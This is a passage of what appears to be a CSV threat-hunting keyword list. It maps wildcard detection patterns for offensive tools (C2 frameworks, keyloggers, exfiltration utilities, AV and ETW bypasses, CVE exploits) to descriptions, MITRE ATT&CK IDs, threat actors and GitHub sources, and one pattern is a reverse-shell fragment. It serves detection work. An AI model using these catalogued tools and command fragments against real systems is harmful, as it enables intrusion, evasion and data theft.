extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. 
it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/albinowax/ActiveScanPlusPlus","1","0","N/A","N/A","6","568","191","2022-11-15T13:47:31Z","2014-06-23T10:04:13Z" +"*from burp import*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" +"*from Exrop import *","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","0","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" +"*from helpers.*_smbserver * import SimpleSMBServer*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*from holehe.core import*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"*from merlin import *","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in 
golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","0","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*from pwn import *","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","0","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" +"*from rarce import exploit*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" +"*from shellcodes import *","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"*from wapitiCore.*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*frpc.exe -c frpc.in*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*fsockopen(*0.0.0.0*4444*exec(*","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential 
Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*FtpC2.exe*","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","1","N/A","10","10","72","15","2023-06-23T08:40:08Z","2023-06-09T12:41:28Z" +"*FtpC2.Tasks*","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","0","N/A","10","10","72","15","2023-06-23T08:40:08Z","2023-06-09T12:41:28Z" +"*ftp-server -u * -P * -p 2121*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ftshell -*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","1","0","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" +"*ftshell.v3*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data 
Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","1","0","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" +"*ftype *findstr *dfil*","greyware_tool_keyword","ftype","will return the file type information for file types that include the string dfil - hidden objectif is to find cmdfile string","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ftype *findstr *SHCm*","greyware_tool_keyword","ftype","will return the file type information for file types that include the string SHCm - hidden objectif is to find SHCmdFile string","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ftype *findstr dfil*","greyware_tool_keyword","ftype","will return the file type information for file types that include the string dfil - hidden objectif is to find cmdfile string","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ftype *findstr SHCm*","greyware_tool_keyword","ftype","will return the file type information for file types that include the string SHCm - hidden objectif is to find SHCmdFile string","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Fuck-Etw-main*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" +"*fucksetuptools*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*FuckThatPacker.*","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang 
Panda - Chimera - APT29","C2","https://github.com/Unknow101/FuckThatPacker","1","1","N/A","10","10","612","91","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z" +"*FudgeC2.*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*FudgeC2Viewer.py*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*fuff *-input-shell*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*fuff *-scraperfile*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*fuff *-scrapers*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*FULLSHADE/WindowsExploitationResources*","offensive_tool_keyword","WindowsExploitationResources","Resources for Windows exploit development","T1203 - T1210 - T1212 - T1216 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/FULLSHADE/WindowsExploitationResources","1","1","N/A","N/A","10","1351","319","2021-12-20T00:21:07Z","2020-05-26T07:19:54Z" +"*func_get_powershell_dll*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"*func_install_wine_dotnettojscript*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"*function psenum*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*function Use-Zeus*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*FunnyWolf/pystinger*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. 
It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" +"*fuse_evil.*","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tools","https://github.com/plummm/CVE-2022-27666","1","1","N/A","N/A","3","203","41","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z" +"*fuse_lowlevel.h*","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","364","55","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z" +"*fuxploider --url * --not-regex ""wrong file type""*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - 
T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*fuxploider*","offensive_tool_keyword","fuxploider","Fuxploider is an open source penetration testing tool that automates the process of detecting and exploiting file upload forms flaws. This tool is able to detect the file types allowed to be uploaded and is able to detect which technique will work best to upload web shells or any malicious file on the desired web server.","T1526 - T1505 - T1506 - T1574","TA0006 - TA0008","N/A","N/A","Web Attacks","https://github.com/almandin/fuxploider","1","0","N/A","N/A","10","2668","485","2023-04-16T19:57:12Z","2017-07-14T09:30:06Z" +"*fuzz_option.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*fuzzdb*","offensive_tool_keyword","fuzzdb","FuzzDB was created to increase the likelihood of finding application security vulnerabilities through dynamic application security testing. Its the first and most comprehensive open dictionary of fault injection patterns. predictable resource locations. 
and regex for matching server responses.","T1190 - T1191 - T1192 - T1193 - T1197","TA0002 - TA0008","N/A","N/A","Web Attacks","https://github.com/fuzzdb-project/fuzzdb","1","0","N/A","N/A","10","7640","2093","2023-02-21T15:21:06Z","2015-09-10T17:54:31Z" +"*fuzzfactory.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*fuzzrequest.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*FuzzySecurity/Dendrobate*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*FuzzySecurity/Sharp-Suite*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*fw_walk disable*","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","0","N/A","10","10","98","13","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" +"*g_hookedSleep.*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" +"*g0h4n/RDE1*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data 
Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*g0h4n/REC2*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*G0ldenGunSec/GetWebDAVStatus*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" 
+"*g0tmi1k*","offensive_tool_keyword","Github Username","Github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/g0tmi1k","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*g3tsyst3m/undertheradar*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","1","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" +"*gabriellandau/PPLFault*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*GadgetToJScript.csproj*","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","8","777","157","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" +"*GadgetToJScript.exe -a *","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 
- T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","0","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" +"*GadgetToJScript.sln*","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","8","777","157","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" +"*GadgetToJScript-master*","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 